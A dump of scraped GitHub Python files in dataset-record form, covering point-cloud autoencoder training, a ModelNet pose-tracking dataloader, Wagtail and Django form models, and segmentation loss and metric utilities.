ref_cloud.shape[0]\n decoded, encoded = model(ref_cloud, batch_size)\n else:\n decoded, encoded = model(ref_cloud)\n loss = loss_fn(ref_cloud, decoded)\n # loss = model.get_loss(ref_cloud, decoded)\n losses.append(loss.item())\n model.train()\n \n return np.mean(losses)\n\n\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--batch_size', type=int, default=32)\nparser.add_argument('--epochs', type=int, default=100, help='Number of epochs')\nparser.add_argument('--checkpoints_path', type=str, default='../checkpoints')\nparser.add_argument('--ndata', type=int, default=4000, help='Number of data ')\nparser.add_argument('--npoints', type=int, default=4000, help='Number of points per cloud')\nparser.add_argument('--train', type=bool, default=False, help='Train or test')\nparser.add_argument('--model_name', type=str , default='vox', help='foldingnet or vox', choices=['foldingnet', 'vox', 'convAE'])\n\nargs = parser.parse_args()\n\n\ndef main(\n batch_size=32,\n epochs=100,\n checkpoints_path='../checkpoints',\n ndata=4000,\n npoints=5000,\n train=True,\n model_name='foldingnet'\n ):\n checkpoints_path = os.path.join(checkpoints_path, model_name)\n\n ############## LOAD MODEL AND DEFINE LEARNING SCENARIO ################\n from FoldingNet import FoldNet, Encoder, Decoder\n from voxel_ae import voxAutoEncoder\n from ch_loss import ChamferLoss\n\n\n import pandas as pd\n test_losses, train_losses = [], []\n\n print ('='*20, 'LOADING MODEL', '='*20)\n print (f\"Model path {checkpoints_path}\")\n 
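# Caveat about the np.loadtxt calls below (an assumption about run history, not something the original code handles): a loss file holding a single value comes back as a 0-d array whose .tolist() is a plain float, so the later .append() would fail. A defensive variant:\n    #   train_losses = np.atleast_1d(np.loadtxt(\n    #       os.path.join(checkpoints_path, 'train_loss.txt'))).tolist()\n    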
############## LOAD PREVIOUS INFORMATIONS ################\n # load results if exists\n if os.path.exists(os.path.join(checkpoints_path, 'train_loss.txt')):\n train_losses = np.loadtxt(os.path.join(checkpoints_path, 'train_loss.txt'))\n train_losses = train_losses.tolist()\n\n if os.path.exists(os.path.join(checkpoints_path, 'val_loss.txt')):\n test_losses = np.loadtxt(os.path.join(checkpoints_path, 'val_loss.txt'))\n test_losses = test_losses.tolist()\n\n # create save folder if not exists\n if not os.path.exists(checkpoints_path):\n os.makedirs(checkpoints_path)\n\n\n ############## LOAD DATA ################\n import sys\n sys.path.append('../')\n from dataset.PointCloudDataset import PointCloudDataset\n from dataset.voxelDataset import VoxelDataset\n\n\n print ('='*20, 'LOADING DATA', '='*20)\n\n if model_name == 'foldingnet':\n dataset_train = PointCloudDataset('../dataset/modelnet40_normal_resampled', \n train=True, \n ndata=4000,\n file_extension='.txt', \n npoints=npoints\n )\n dataset_val = PointCloudDataset('../dataset/modelnet40_normal_resampled', \n train=False, \n ndata=2000,\n file_extension='.txt', \n npoints=npoints\n )\n\n # sample ndata points from each cloud\n np.random.seed(0)\n dataset_train = torch.utils.data.Subset(dataset_train, np.random.choice(len(dataset_train), ndata, replace=False))\n dataset_val = torch.utils.data.Subset(dataset_val, np.random.choice(len(dataset_val), int(ndata/20), replace=False)) \n\n print (f\"Train dataset size: {len(dataset_train)}\")\n print (f\"Val dataset size: {len(dataset_val)}\")\n\n # # model = FoldNet(num_points=npoints).to(DEVICE)\n # from convAE import AutoEncoder\n # model = AutoEncoder(npoints, batch_size=batch_size).to(DEVICE)\n\n model = FoldNet(num_points=npoints).to(DEVICE)\n \n elif model_name == 'vox':\n input_shape = (32, 32, 32)\n dataset_train = VoxelDataset('../dataset/ModelNet40', \n train=True, \n )\n dataset_val = VoxelDataset('../dataset/ModelNet40', \n train=False, \n )\n\n\n print (f\"Train dataset size: {len(dataset_train)}\")\n print (f\"Val dataset size: {len(dataset_val)}\")\n \n model = voxAutoEncoder(input_shape).to(DEVICE)\n\n elif model_name == 'convAE':\n dataset_train = PointCloudDataset('../dataset/modelnet40_normal_resampled', \n train=True, \n ndata=4000,\n file_extension='.txt', \n npoints=npoints\n )\n dataset_val = PointCloudDataset('../dataset/modelnet40_normal_resampled', \n train=False, \n ndata=2000,\n file_extension='.txt', \n npoints=npoints\n )\n\n # sample ndata points from each cloud\n np.random.seed(0)\n dataset_train = torch.utils.data.Subset(dataset_train, np.random.choice(len(dataset_train), ndata, replace=False))\n dataset_val = torch.utils.data.Subset(dataset_val, np.random.choice(len(dataset_val), int(ndata/20), replace=False)) \n\n print (f\"Train dataset size: {len(dataset_train)}\")\n print (f\"Val dataset size: {len(dataset_val)}\")\n\n from convAE import AutoEncoder\n model = AutoEncoder(npoints).to(DEVICE)\n\n\n # load model if exists\n models_saved = glob.glob(os.path.join(checkpoints_path, 'model_*.pth'))\n if len(models_saved) > 0:\n # get most recent model\n epoches_done = max([int(m.split('_')[-1].split('.')[0]) for m in models_saved])\n model_path = os.path.join(checkpoints_path, f'model_{epoches_done}.pth')\n print(f\"Loading model from {model_path}\")\n model.load_state_dict(torch.load(model_path))\n else:\n epoches_done = 0\n\n \n from torch.utils.data import DataLoader, SubsetRandomSampler\n ndata = 1000\n # subset of dataloader\n train_loader = 
DataLoader(dataset_train, batch_size=batch_size, num_workers=4, shuffle=True)\n test_loader = DataLoader(dataset_val, batch_size=32, num_workers=4, shuffle=False)\n\n ############## TRAINING ################\n optimizer = optim.Adam(model.parameters(), lr=1e-3, weight_decay=1e-6)\n loss_fn = None\n if model_name in ['foldingnet' , 'convAE']:\n print ('='*20, 'USING CHAMFER LOSS', '='*20)\n from ch_loss import ChamferLoss\n loss_fn = ChamferLoss()\n\n \n elif model_name == 'vox':\n print ('='*20, 'USING MSE LOSS', '='*20)\n loss_fn = nn.MSELoss()\n\n if train:\n print ('='*20, 'TRAINING', '='*20)\n for epoch in range(epoches_done, epoches_done+epochs+1):\n print('=' * 20, epoch + 1, '=' * 20)\n tloss = train_one_epoch(train_loader, model, optimizer, loss_fn, model_name)\n vloss= test_one_epoch(test_loader, model, loss_fn, model_name)\n print('Epoch: {}, train loss: {:.4f}, val loss: {:.4f}'.format(epoch, tloss, vloss))\n\n train_losses.append(tloss)\n test_losses.append(vloss)\n \n # save model\n saved_path = os.path.join(checkpoints_path, \"model_{}.pth\".format(epoch))\n torch.save(model.state_dict(), saved_path)\n\n # save losses \n np.savetxt(os.path.join(checkpoints_path, 'train_loss.txt'), train_losses)\n np.savetxt(os.path.join(checkpoints_path, 'val_loss.txt'), test_losses)\n\n else:\n print ('=' * 20, 'TESTING', '=' * 20)\n loss = test_one_epoch(test_loader, model, loss_fn, model_name)\n print('Test loss: {:.4f}'.format(loss))\n\n\n\nif __name__ == '__main__':\n main( **vars(args))","repo_name":"NicolaZomer/3D-Object-Classification","sub_path":"autoencoder_strategy/trainAE.py","file_name":"trainAE.py","file_ext":"py","file_size_in_byte":9939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9540806838","text":"import os, sys\nimport time\nimport numpy as np\nimport torch.utils.data as data\nimport torch\nfrom PIL import Image\n\nnp.random.seed(2022)\nfrom lib.utils.logger import print_and_log_info\nfrom lib.dataloader import image_utils, utils, augmentation\nfrom lib.dataset.modelNet import dataloader_utils\nnames = [\"cad_name\", \"img_full_path\", \"delta_rotation\", \"delta_uv\", \"delta_depth\",\n \"rotation_first_frame\", \"uv_first_frame\", \"depth_first_frame\",\n \"gt_rotations\", \"gt_translations\"]\n\n\nclass ModelNet(data.Dataset):\n def __init__(self, root_dir, split, config_training, logger, is_master):\n self.is_master = is_master\n self.logger = logger\n self.root_dir = root_dir\n self.split = split\n self.use_augmentation = config_training.use_augmentation\n self.image_size = config_training.image_size\n self.save_path = config_training.save_path\n self.debug_mode = config_training.debug_mode # debugging mode (to visualize samples and loader quickly)\n\n self.sequence_data = self.get_data_from_split_name()\n if self.is_master:\n print_and_log_info(self.logger,\n \"Size of dataloader: {}\".format(sys.getsizeof(self.sequence_data) / (10 ** 9)))\n print_and_log_info(self.logger, \"Len of dataset :{}\".format(self.__len__()))\n self.save_random_sequences()\n\n def __len__(self):\n return len(self.sequence_data[\"img_full_path\"])\n\n def get_data_from_split_name(self):\n start_time = time.time()\n list_files = os.path.join(self.root_dir, self.split + \".txt\")\n with open(list_files, 'r') as f:\n list_id_model = [x.strip() for x in f.readlines()]\n if self.debug_mode:\n list_id_model = list_id_model[:500]\n\n sequence_data = {names[i]: [] for i in range(len(names))}\n for id_model in list_id_model:\n 
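# Each id_model names one trajectory folder under root_dir (inferred from the path join below); build its ground-truth tracking sequence and flatten the per-frame fields into sequence_data.\n            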
path_trajectory = os.path.join(self.root_dir, id_model)\n sequence_obj = dataloader_utils.SequenceProcessing(root_path=path_trajectory, dataset_name=\"modelNet\")\n gt_sequence_obj = sequence_obj.create_gt_tracking()\n sequence_data[\"img_full_path\"].extend(sequence_obj.create_list_img_path())\n sequence_data[\"cad_name\"].extend([id_model for _ in range(len(sequence_obj.create_list_img_path()))])\n for name in names[2:]:\n sequence_data[name].extend(gt_sequence_obj[name])\n if str(self.split).endswith(\"train\"):\n print(\"Shuffling data before training...\")\n sequence_data = utils.shuffle_dictionary(sequence_data)\n if self.is_master:\n print_and_log_info(self.logger, \"Loading dataLoader takes {} seconds\".format(time.time() - start_time))\n return sequence_data\n\n def _fetch_sequence(self, img_path, save_path=None):\n sequence_img, list_bbox = [], []\n for i in range(2):\n img = image_utils.open_image(img_path[i])\n sequence_img.append(img)\n list_bbox.append(np.asarray(img.getbbox()))\n # take max bbox of two images\n bbox_sequence = np.zeros(4)\n bbox_sequence[0] = np.min([list_bbox[0][0], list_bbox[1][0]])\n bbox_sequence[1] = np.min([list_bbox[0][1], list_bbox[1][1]])\n bbox_sequence[2] = np.max([list_bbox[0][2], list_bbox[1][2]])\n bbox_sequence[3] = np.max([list_bbox[0][3], list_bbox[1][3]])\n\n bbox_size = np.max([bbox_sequence[2] - bbox_sequence[0], bbox_sequence[3] - bbox_sequence[1]])\n max_size_with_margin = bbox_size * 1.3 # margin = 0.2 x max_dim\n margin = bbox_size * 0.15\n bbox_sequence = bbox_sequence + np.array([-margin, -margin, margin, margin])\n bbox_sequence_square = image_utils.make_bbox_square(bbox_sequence, max_size_with_margin)\n ratio = self.image_size / max_size_with_margin # keep this value to predict translation later\n for i in range(2):\n cropped_img = sequence_img[i].crop(bbox_sequence_square)\n cropped_resized_img = cropped_img.resize((self.image_size, self.image_size), Image.ANTIALIAS)\n sequence_img[i] = cropped_resized_img\n if \"train\" in self.split and self.use_augmentation:\n sequence_img = augmentation.apply_data_augmentation(2, sequence_img)\n if save_path is None:\n seq_img = np.zeros((2, 3, self.image_size, self.image_size))\n for i in range(2):\n seq_img[i] = image_utils.normalize(sequence_img[i].convert(\"RGB\"))\n return seq_img, ratio, bbox_sequence_square\n else:\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n for i in range(2):\n sequence_img[i].save(os.path.join(save_path, \"frame_{:02d}.png\".format(i)))\n\n def __getitem__(self, index):\n seq_img_path = self.sequence_data[\"img_full_path\"][index]\n cad_name = self.sequence_data[\"cad_name\"][index]\n seq_img, ratio, bbox_sequence_square = self._fetch_sequence(seq_img_path)\n data_batch = {names[i]: [] for i in range(1, len(names))}\n for name in names[2:]:\n tmp = self.sequence_data[name][index]\n if name == \"delta_uv\":\n tmp = tmp * ratio / (self.image_size / 2)\n elif name == \"delta_depth\":\n tmp = tmp * ratio\n data_batch[name] = torch.from_numpy(np.ascontiguousarray(tmp)).float()\n seq_img = torch.from_numpy(np.ascontiguousarray(seq_img)).float()\n ratio = torch.from_numpy(np.ascontiguousarray(ratio)).float()\n bbox_sequence_square = torch.from_numpy(np.ascontiguousarray(bbox_sequence_square)).float()\n data_batch = dict(seq_img=seq_img,\n ratio=ratio,\n cad_name=cad_name,\n bbox_sequence_square=bbox_sequence_square,\n delta_rotation=data_batch[\"delta_rotation\"],\n delta_uv=data_batch[\"delta_uv\"],\n delta_depth=data_batch[\"delta_depth\"],\n 
rotation_first_frame=data_batch[\"rotation_first_frame\"],\n uv_first_frame=data_batch[\"uv_first_frame\"],\n depth_first_frame=data_batch[\"depth_first_frame\"],\n gt_rotations=data_batch[\"gt_rotations\"],\n gt_translations=data_batch[\"gt_translations\"],\n img_path=seq_img_path[0])\n return data_batch\n\n def save_random_sequences(self):\n print_and_log_info(self.logger, \"Saving training samples at {}\".format(self.save_path))\n list_index = np.unique(np.random.randint(0, self.__len__(), 10))\n for index in list_index:\n save_sequence_path = os.path.join(self.save_path, \"{:06d}\".format(index))\n self._fetch_sequence(self.sequence_data[\"img_full_path\"][index], save_sequence_path)","repo_name":"nv-nguyen/pizza","sub_path":"lib/dataset/modelNet/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"40"} +{"seq_id":"28219015455","text":"from django.forms import widgets\nfrom modelcluster.fields import ParentalKey\nfrom wagtail.wagtailadmin.edit_handlers import (FieldPanel, FieldRowPanel, \n InlinePanel, MultiFieldPanel)\nfrom wagtail.wagtailcore.fields import RichTextField\nfrom wagtail.wagtailforms.models import AbstractEmailForm, AbstractFormField\n\n\nclass FormField(AbstractFormField):\n page = ParentalKey('FormPage', related_name='form_fields')\n\n\nclass FormPage(AbstractEmailForm):\n intro = RichTextField(blank=True)\n thank_you_text = RichTextField(blank=True)\n\n content_panels = AbstractEmailForm.content_panels + [\n FieldPanel('intro', classname=\"full\"),\n InlinePanel('form_fields', label=\"Form fields\"),\n FieldPanel('thank_you_text', classname=\"full\"),\n MultiFieldPanel([\n FieldRowPanel([\n FieldPanel('from_address', classname=\"col6\"),\n FieldPanel('to_address', classname=\"col6\"),\n ]),\n FieldPanel('subject'),\n ], \"Email\"),\n ]\n\n def get_form(self, *args, **kwargs):\n form = super().get_form(*args, **kwargs)\n # iterate through the fields in the generated form\n for name, field in form.fields.items():\n # if the field is a TextArea - adjust the columns \n if isinstance(field.widget, widgets.Textarea):\n field.widget.attrs.update({'cols': '5'})\n return form\n\n","repo_name":"jkang8/jk","sub_path":"contact/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31898300767","text":"from django import forms\nfrom .models import Bookmark, Category\n\n\nclass BookmarkForm(forms.ModelForm):\n description = forms.CharField(widget=forms.Textarea(attrs={'rows': 2}), required=False)\n\n class Meta:\n model = Bookmark\n fields = ['title', 'link', 'category', 'description', 'safe']\n\n\nclass CategoryForm(forms.ModelForm):\n class Meta:\n model = Category\n fields = ['name', 'description', ]","repo_name":"oussama-he/prodUtils","sub_path":"bookmark/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3052965251","text":"import os\nfrom math import ceil\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\nfrom torch.autograd import Variable\n\n\ndef check_mkdir(dir_name):\n if not os.path.exists(dir_name):\n os.mkdir(dir_name)\n\n\ndef initialize_weights(*models):\n for model in models:\n for module in model.modules():\n if isinstance(module, 
nn.Conv2d) or isinstance(module, nn.Linear):\n nn.init.kaiming_normal_(module.weight)\n if module.bias is not None:\n module.bias.data.zero_()\n elif isinstance(module, nn.BatchNorm2d):\n module.weight.data.fill_(1)\n module.bias.data.zero_()\n\n\ndef get_upsampling_weight(in_channels, out_channels, kernel_size):\n factor = (kernel_size + 1) // 2\n if kernel_size % 2 == 1:\n center = factor - 1\n else:\n center = factor - 0.5\n og = np.ogrid[:kernel_size, :kernel_size]\n filt = (1 - abs(og[0] - center) / factor) * (1 - abs(og[1] - center) / factor)\n weight = np.zeros((in_channels, out_channels, kernel_size, kernel_size), dtype=np.float64)\n weight[list(range(in_channels)), list(range(out_channels)), :, :] = filt\n return torch.from_numpy(weight).float()\n\n\nclass CrossEntropyLoss2d(nn.Module):\n def __init__(self, weight=None, size_average=True, ignore_index=255):\n super(CrossEntropyLoss2d, self).__init__()\n self.nll_loss = nn.NLLLoss2d(weight, size_average, ignore_index)\n\n def forward(self, inputs, targets):\n return self.nll_loss(F.log_softmax(inputs), targets)\n\n\nclass FocalLoss2d(nn.Module):\n def __init__(self, gamma=2, weight=None, size_average=True, ignore_index=255):\n super(FocalLoss2d, self).__init__()\n self.gamma = gamma\n self.nll_loss = nn.NLLLoss(weight, size_average, ignore_index)\n\n def forward(self, inputs, targets):\n return self.nll_loss((1 - F.softmax(inputs)) ** self.gamma * F.log_softmax(inputs), targets)\n\n\ndef _fast_hist(label_pred, label_true, num_classes):\n mask = (label_true >= 0) & (label_true < num_classes)\n hist = np.bincount(\n num_classes * label_true[mask].astype(int) +\n label_pred[mask], minlength=num_classes ** 2).reshape(num_classes, num_classes)\n return hist\n\n\ndef evaluate(predictions, gts, num_classes):\n hist = np.zeros((num_classes, num_classes))\n for lp, lt in zip(predictions, gts):\n hist += _fast_hist(lp.flatten(), lt.flatten(), num_classes)\n # axis 0: gt, axis 1: prediction\n acc = np.diag(hist).sum() / hist.sum()\n acc_cls = np.diag(hist) / hist.sum(axis=1)\n acc_cls = np.nanmean(acc_cls)\n iu = np.diag(hist) / (hist.sum(axis=1) + hist.sum(axis=0) - np.diag(hist))\n mean_iu = np.nanmean(iu)\n freq = hist.sum(axis=1) / hist.sum()\n fwavacc = (freq[freq > 0] * iu[freq > 0]).sum()\n return acc, acc_cls, mean_iu, fwavacc\n\n\ndef jaccard(label_pred, label_gt, num_classes=1):\n sum_axis = tuple(range(len(label_gt.shape)))[1:]\n if num_classes == 1:\n\n product = np.multiply(label_pred, label_gt)\n intersection = np.sum(product, axis=sum_axis) + 1e-10\n # intersection = (np.sum(product, axis=sum_axis))\n union = (np.sum(np.square(label_gt), axis=sum_axis) + np.sum(np.square(label_pred), axis=sum_axis) - np.sum(product, axis=sum_axis) + 1e-10)\n return np.mean(intersection / union)\n else:\n label_pred = np.argmax(label_pred, axis=-3)\n jacc = np.zeros(num_classes)\n for c in range(num_classes):\n c_lbgt = (label_gt == c).astype(int)\n c_lbpred = (label_pred == c).astype(int)\n jacc[c] += (jaccard(c_lbpred, c_lbgt))\n return jacc\n\n\ndef count_pixels(label_pred, label_gt, num_classes=1, threshold=0.5):\n if num_classes == 1:\n label_pred[label_pred < threshold] = 0\n label_pred[label_pred >= threshold] = 1\n\n product = np.multiply(label_pred, label_gt)\n return np.sum(product), (np.sum(np.square(label_gt)) + np.sum(np.square(label_pred)) - np.sum(product))\n else:\n label_pred_sm = np.argmax(label_pred, axis=-3)\n num = np.zeros(num_classes)\n den = np.zeros(num_classes)\n for c in range(num_classes):\n c_lbgt = (label_gt == 
c).astype(int)\n c_lbpred = (label_pred_sm == c).astype(int)\n res = (count_pixels(c_lbpred, c_lbgt))\n num[c] += res[0]\n den[c] += res[1]\n return num, den\n\n\ndef count_pixels_multiclass(label_pred, label_gt, num_classes=1, threshold=0.5, ignore_label=255):\n classes_dummy = np.arange(num_classes)[None, :, None, None]\n label_gt = np.expand_dims(label_gt, axis=1)\n argmax_mask = (np.expand_dims(label_pred.argmax(axis=1), axis=1) == classes_dummy).astype(int)\n threshold_mask = np.where(label_pred > threshold, 1, 0)\n ignore_mask = np.where(label_gt != ignore_label, 1, 0)\n c_lbpred = np.multiply(argmax_mask, threshold_mask)\n c_lbgt = (label_gt == classes_dummy).astype(int)\n c_lbpred = np.multiply(c_lbpred, ignore_mask)\n c_lbgt = np.multiply(c_lbgt, ignore_mask)\n\n product = np.multiply(c_lbpred, c_lbgt)\n num = np.sum(product, axis=(0, 2, 3))\n den = (np.sum(c_lbgt, axis=(0, 2, 3)) + np.sum(c_lbpred, axis=(0, 2, 3)) -\n np.sum(product, axis=(0, 2, 3)))\n return num, den\n\n\ndef count_pixels_multiclass_gpu(label_pred, label_gt, num_classes=1, threshold=0.5, ignore_label=255, dims_to_keep=(1,)):\n assert label_pred.shape == label_gt.shape\n sum_axis = tuple([i for i in tuple(range(len(label_gt.shape))) if i not in dims_to_keep])\n threshold_mask = torch.where(label_pred > threshold, torch.tensor(1, device='cuda'), torch.tensor(0, device='cuda'))\n\n if num_classes != 1:\n classes_dummy = torch.arange(num_classes, device='cuda')[None, :, None, None]\n label_gt = torch.unsqueeze(label_gt, dim=1)\n argmax_mask = (torch.unsqueeze(label_pred.argmax(axis=1), dim=1) == classes_dummy).int()\n c_lbpred = argmax_mask * threshold_mask\n c_lbgt = (label_gt == classes_dummy).int()\n ignore_mask = torch.where(label_gt != ignore_label, torch.tensor(1, device='cuda'), torch.tensor(0, device='cuda'))\n c_lbpred = c_lbpred * ignore_mask\n c_lbgt = c_lbgt * ignore_mask\n else:\n c_lbpred = threshold_mask\n c_lbgt = label_gt\n\n product = c_lbpred * c_lbgt\n eps = 1e-6\n num = torch.sum(product, dim=sum_axis)\n den = (torch.sum(c_lbgt, dim=sum_axis) + torch.sum(c_lbpred, dim=sum_axis))\n return (num + eps) / (den - num + eps), (2 * num + eps) / (den + eps)\n\n\nclass AverageMeter(object):\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\nclass PolyLR(object):\n def __init__(self, optimizer, curr_iter, max_iter, lr_decay):\n self.max_iter = float(max_iter)\n self.init_lr_groups = []\n for p in optimizer.param_groups:\n self.init_lr_groups.append(p['lr'])\n self.param_groups = optimizer.param_groups\n self.curr_iter = curr_iter\n self.lr_decay = lr_decay\n\n def step(self):\n for idx, p in enumerate(self.param_groups):\n p['lr'] = self.init_lr_groups[idx] * (1 - self.curr_iter / self.max_iter) ** self.lr_decay\n\n\n# just a try, not recommend to use\nclass Conv2dDeformable(nn.Module):\n def __init__(self, regular_filter, cuda=True):\n super(Conv2dDeformable, self).__init__()\n assert isinstance(regular_filter, nn.Conv2d)\n self.regular_filter = regular_filter\n self.offset_filter = nn.Conv2d(regular_filter.in_channels, 2 * regular_filter.in_channels, kernel_size=3,\n padding=1, bias=False)\n self.offset_filter.weight.data.normal_(0, 0.0005)\n self.input_shape = None\n self.grid_w = None\n self.grid_h = None\n self.cuda = cuda\n\n def forward(self, x):\n x_shape = x.size() # (b, c, h, w)\n offset = 
self.offset_filter(x)  # (b, 2*c, h, w)\n        offset_w, offset_h = torch.split(offset, self.regular_filter.in_channels, 1)  # (b, c, h, w)\n        offset_w = offset_w.contiguous().view(-1, int(x_shape[2]), int(x_shape[3]))  # (b*c, h, w)\n        offset_h = offset_h.contiguous().view(-1, int(x_shape[2]), int(x_shape[3]))  # (b*c, h, w)\n        if not self.input_shape or self.input_shape != x_shape:\n            self.input_shape = x_shape\n            grid_w, grid_h = np.meshgrid(np.linspace(-1, 1, x_shape[3]), np.linspace(-1, 1, x_shape[2]))  # (h, w)\n            grid_w = torch.Tensor(grid_w)\n            grid_h = torch.Tensor(grid_h)\n            if self.cuda:\n                grid_w = grid_w.cuda()\n                grid_h = grid_h.cuda()\n            self.grid_w = nn.Parameter(grid_w)\n            self.grid_h = nn.Parameter(grid_h)\n        offset_w = offset_w + self.grid_w  # (b*c, h, w)\n        offset_h = offset_h + self.grid_h  # (b*c, h, w)\n        x = x.contiguous().view(-1, int(x_shape[2]), int(x_shape[3])).unsqueeze(1)  # (b*c, 1, h, w)\n        x = F.grid_sample(x, torch.stack((offset_h, offset_w), 3))  # (b*c, h, w)\n        x = x.contiguous().view(-1, int(x_shape[1]), int(x_shape[2]), int(x_shape[3]))  # (b, c, h, w)\n        x = self.regular_filter(x)\n        return x\n\n\ndef sliced_forward(single_forward):\n    def _pad(x, crop_size):\n        h, w = x.size()[2:]\n        pad_h = max(crop_size - h, 0)\n        pad_w = max(crop_size - w, 0)\n        x = F.pad(x, (0, pad_w, 0, pad_h))\n        return x, pad_h, pad_w\n\n    def wrapper(self, x):\n        batch_size, _, ori_h, ori_w = x.size()\n        if self.training and self.use_aux:\n            outputs_all_scales = Variable(torch.zeros((batch_size, self.num_classes, ori_h, ori_w))).cuda()\n            aux_all_scales = Variable(torch.zeros((batch_size, self.num_classes, ori_h, ori_w))).cuda()\n            for s in self.scales:\n                new_size = (int(ori_h * s), int(ori_w * s))\n                scaled_x = F.upsample(x, size=new_size, mode='bilinear')\n                scaled_x = Variable(scaled_x).cuda()\n                scaled_h, scaled_w = scaled_x.size()[2:]\n                long_size = max(scaled_h, scaled_w)\n                print(scaled_x.size())\n\n                if long_size > self.crop_size:\n                    count = torch.zeros((scaled_h, scaled_w))\n                    outputs = Variable(torch.zeros((batch_size, self.num_classes, scaled_h, scaled_w))).cuda()\n                    aux_outputs = Variable(torch.zeros((batch_size, self.num_classes, scaled_h, scaled_w))).cuda()\n                    stride = int(ceil(self.crop_size * self.stride_rate))\n                    h_step_num = int(ceil((scaled_h - self.crop_size) / stride)) + 1\n                    w_step_num = int(ceil((scaled_w - self.crop_size) / stride)) + 1\n                    for yy in range(h_step_num):\n                        for xx in range(w_step_num):\n                            sy, sx = yy * stride, xx * stride\n                            ey, ex = sy + self.crop_size, sx + self.crop_size\n                            x_sub = scaled_x[:, :, sy: ey, sx: ex]\n                            x_sub, pad_h, pad_w = _pad(x_sub, self.crop_size)\n                            print(x_sub.size())\n                            outputs_sub, aux_sub = single_forward(self, x_sub)\n\n                            if sy + self.crop_size > scaled_h:\n                                outputs_sub = outputs_sub[:, :, : -pad_h, :]\n                                aux_sub = aux_sub[:, :, : -pad_h, :]\n\n                            if sx + self.crop_size > scaled_w:\n                                outputs_sub = outputs_sub[:, :, :, : -pad_w]\n                                aux_sub = aux_sub[:, :, :, : -pad_w]\n\n                            outputs[:, :, sy: ey, sx: ex] = outputs_sub\n                            aux_outputs[:, :, sy: ey, sx: ex] = aux_sub\n\n                            count[sy: ey, sx: ex] += 1\n                    count = Variable(count).cuda()\n                    outputs = (outputs / count)\n                    aux_outputs = (aux_outputs / count)\n                else:\n                    scaled_x, pad_h, pad_w = _pad(scaled_x, self.crop_size)\n                    outputs, aux_outputs = single_forward(self, scaled_x)\n                    outputs = outputs[:, :, : -pad_h, : -pad_w]\n                    aux_outputs = aux_outputs[:, :, : -pad_h, : -pad_w]\n                outputs_all_scales += outputs\n                aux_all_scales += aux_outputs\n            return outputs_all_scales / len(self.scales), aux_all_scales\n        else:\n            outputs_all_scales = 
Variable(torch.zeros((batch_size, self.num_classes, ori_h, ori_w))).cuda()\n for s in self.scales:\n new_size = (int(ori_h * s), int(ori_w * s))\n scaled_x = F.upsample(x, size=new_size, mode='bilinear')\n scaled_h, scaled_w = scaled_x.size()[2:]\n long_size = max(scaled_h, scaled_w)\n\n if long_size > self.crop_size:\n count = torch.zeros((scaled_h, scaled_w))\n outputs = Variable(torch.zeros((batch_size, self.num_classes, scaled_h, scaled_w))).cuda()\n stride = int(ceil(self.crop_size * self.stride_rate))\n h_step_num = int(ceil((scaled_h - self.crop_size) / stride)) + 1\n w_step_num = int(ceil((scaled_w - self.crop_size) / stride)) + 1\n for yy in range(h_step_num):\n for xx in range(w_step_num):\n sy, sx = yy * stride, xx * stride\n ey, ex = sy + self.crop_size, sx + self.crop_size\n x_sub = scaled_x[:, :, sy: ey, sx: ex]\n x_sub, pad_h, pad_w = _pad(x_sub, self.crop_size)\n\n outputs_sub = single_forward(self, x_sub)\n\n if sy + self.crop_size > scaled_h:\n outputs_sub = outputs_sub[:, :, : -pad_h, :]\n\n if sx + self.crop_size > scaled_w:\n outputs_sub = outputs_sub[:, :, :, : -pad_w]\n\n outputs[:, :, sy: ey, sx: ex] = outputs_sub\n\n count[sy: ey, sx: ex] += 1\n count = Variable(count).cuda()\n outputs = (outputs / count)\n else:\n scaled_x, pad_h, pad_w = _pad(scaled_x, self.crop_size)\n outputs = single_forward(self, scaled_x)\n outputs = outputs[:, :, : -pad_h, : -pad_w]\n outputs_all_scales += outputs\n return outputs_all_scales\n\n return wrapper\n\n\nclass Progress:\n \"\"\"Determine the progress parameter of the training given the epoch and the progression in the epoch\n Args:\n n_iter (int): the number of epochs before changing the progress,\n pmax (int): the maximum progress of the training.\n batchSizeList (list): the list of the batchSize to adopt during the training\n \"\"\"\n\n def __init__(self, n_iter, pmax, batchSizeList):\n assert n_iter > 0 and isinstance(n_iter, int), 'n_iter must be int >= 1'\n assert pmax >= 0 and isinstance(pmax, int), 'pmax must be int >= 0'\n assert isinstance(batchSizeList, list) and \\\n all(isinstance(x, int) for x in batchSizeList) and \\\n all(x > 0 for x in batchSizeList) and \\\n len(batchSizeList) == pmax + 1, \\\n 'batchSizeList must be a list of int > 0 and of length pmax+1'\n\n self.n_iter = n_iter\n self.pmax = pmax\n self.p = 0\n self.batchSizeList = batchSizeList\n\n def progress(self, epoch, i, total):\n \"\"\"Update the progress given the epoch and the iteration of the epoch\n Args:\n epoch (int): batch of images to resize\n i (int): iteration in the epoch\n total (int): total number of iterations in the epoch\n \"\"\"\n x = (epoch + i / total) / self.n_iter\n self.p = min(max(int(x / 2), x - ceil(x / 2), 0), self.pmax)\n return self.p\n\n def resize(self, images):\n \"\"\"Resize the images w.r.t the current value of the progress.\n Args:\n images (Variable or Tensor): batch of images to resize\n \"\"\"\n x = int(ceil(self.p))\n if x >= self.pmax:\n return images\n else:\n return F.adaptive_avg_pool2d(images, 4 * 2 ** x)\n\n @property\n def batchSize(self):\n \"\"\"Returns the current batchSize w.r.t the current value of the progress\"\"\"\n x = int(ceil(self.p))\n return self.batchSizeList[x]\n","repo_name":"PollastriFederico/3D-self-attention","sub_path":"deep_learning/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16887,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"26329042973","text":"import tensorflow as 